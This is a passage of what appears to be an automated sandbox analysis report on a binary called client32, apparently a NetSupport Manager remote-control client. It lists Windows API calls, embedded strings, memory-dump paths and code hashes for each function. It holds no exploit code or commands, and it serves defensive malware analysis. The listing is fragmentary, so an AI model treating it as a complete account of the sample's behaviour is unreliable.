                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                                        • wsprintfA.USER32 ref: 1100D720
                                                                                        • _memset.LIBCMT ref: 1100D731
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                                        • CloseHandle.KERNEL32(?), ref: 1100D781
                                                                                        • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                        • String ID: %sNSSilence.exe %u %u$D
                                                                                        • API String ID: 1760462761-4146734959
                                                                                        • Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                        • Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
                                                                                        • Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                        • Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                        • String ID:
                                                                                        • API String ID: 4121194973-0
                                                                                        • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                        • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                        • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                        • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                                        • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                                        • GetPropA.USER32(?), ref: 1113F85D
                                                                                        • wsprintfA.USER32 ref: 1113F88F
                                                                                        • RemovePropA.USER32(?), ref: 1113F8C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                                        • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                        • API String ID: 2013984029-1590351400
                                                                                        • Opcode ID: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                        • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                                        • Opcode Fuzzy Hash: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                        • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _strtok$_malloc
                                                                                        • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                                        • API String ID: 665538724-3655815180
                                                                                        • Opcode ID: 710627598e3b966366d406d7ea3925015b8042895ddc3fbf13d12b3ddc031e79
                                                                                        • Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
                                                                                        • Opcode Fuzzy Hash: 710627598e3b966366d406d7ea3925015b8042895ddc3fbf13d12b3ddc031e79
                                                                                        • Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91
                                                                                        APIs
                                                                                        • CountClipboardFormats.USER32 ref: 11033091
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                          • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                          • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                        • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                        • GetLastError.KERNEL32 ref: 110331BF
                                                                                        • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                        • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                        • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                        • API String ID: 3210887762-597690070
                                                                                        • Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                        • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                        • Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                        • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(111EE294,B24479DC,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                                        • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • std::exception::exception.LIBCMT ref: 11053635
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                        • GetTickCount.KERNEL32(?,00000000,11181BDE), ref: 11053660
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                        • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                          • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                        • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                        • API String ID: 2238969640-1197860701
                                                                                        • Opcode ID: a4441b3a21ad501530920e862548792869f6a52b65b69d05ed3757c135f1c0d1
                                                                                        • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                        • Opcode Fuzzy Hash: a4441b3a21ad501530920e862548792869f6a52b65b69d05ed3757c135f1c0d1
                                                                                        • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32(B24479DC,1102E747,?,00000000,000000FF), ref: 11107715
                                                                                        • EnterCriticalSection.KERNEL32 ref: 11107728
                                                                                        • GetTickCount.KERNEL32 ref: 1110772E
                                                                                        • _strncpy.LIBCMT ref: 111077EB
                                                                                        • GetTickCount.KERNEL32 ref: 1110780C
                                                                                        • LeaveCriticalSection.KERNEL32(0NN), ref: 11107815
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                                        • String ID: 0NN$SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                        • API String ID: 3891031082-3295293343
                                                                                        • Opcode ID: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                        • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                                        • Opcode Fuzzy Hash: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                        • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,774E42C0,00000000), ref: 11065525
                                                                                          • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                          • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                                        • GetDC.USER32(00000000), ref: 11065558
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                                        • String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                                        • API String ID: 3945178471-2526036698
                                                                                        • Opcode ID: be64c8f11d315dafd5fcf728b19d215ad6edf1e455b8b0736fd2626b359808b8
                                                                                        • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                                        • Opcode Fuzzy Hash: be64c8f11d315dafd5fcf728b19d215ad6edf1e455b8b0736fd2626b359808b8
                                                                                        • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                                        APIs
                                                                                        • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                        • _memset.LIBCMT ref: 1101F2D8
                                                                                        • GetMenuItemInfoA.USER32 ref: 1101F2F6
                                                                                        • _free.LIBCMT ref: 1101F305
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                        • _free.LIBCMT ref: 1101F30E
                                                                                        • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                        • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                        • String ID: $0$UndoOwnerDraw
                                                                                        • API String ID: 4094458939-790594647
                                                                                        • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                        • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                        • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                        • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 1106F737
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeavewsprintf
                                                                                        • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                        • API String ID: 3005300677-3496508882
                                                                                        • Opcode ID: 2001d87728a614cb12b208929ef54efa7c413359fb74f95ac4bf7d33211d9503
                                                                                        • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                                        • Opcode Fuzzy Hash: 2001d87728a614cb12b208929ef54efa7c413359fb74f95ac4bf7d33211d9503
                                                                                        • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 1104147B
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001033C,?,00000002,00002710,?), ref: 11041670
                                                                                        • _free.LIBCMT ref: 11041677
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
